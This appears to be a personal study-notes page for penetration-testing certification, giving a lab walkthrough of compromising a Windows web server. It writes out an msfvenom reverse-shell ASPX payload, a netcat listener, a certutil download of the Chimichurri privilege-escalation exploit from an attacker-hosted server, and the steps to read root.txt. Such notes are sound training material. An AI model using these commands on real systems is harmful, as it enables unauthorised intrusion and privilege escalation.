Search

Home

PNPT Studies

PJPT Studies

AD CS / Certificate Attacks (ESC1-15) (1, 8, 11 for now)

Report Writing / Client Presentation

Operationalizing Cybercrime Data (June 2025)

Manual Kernel Exploitation

Create a non meterpreter shell:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=4444 -f aspx > manual.aspx

FTP to victim machine:

ftp 10.10.10.5

open listener with the same port as creating shell:

nc -nvlp 4444

Navigate to website:

10.10.10.5/manual.aspx

Should have shell.

Find an exploit that works (we found Chimichurri 59) and download it

get it there:

host a python server in the downloads folder (or whererever it is):

cd Downloads/
python3 -m http.server 8080

on the victim/windows:

Go to temp folder:

cd c:\windows\temp

wget for windows is certutil

certutil -urlcache -f http://10.10.14.19:8080/Chimichurri.exe ms.exe

-f is file

Chimichurri.exe is the name of what we downloaded

image
image

To check it’s there you can:

dir #and check for ms.exe

Find out usage. Chimichurri usage:

ms.exe 10.10.14.19 5555

the exe, attacker machine IP, port opened on netcat on Kali (open a new one before hitting enter)

image

cd to desktop:

cd c:\users\administrator\desktop

cat file:

type root.txt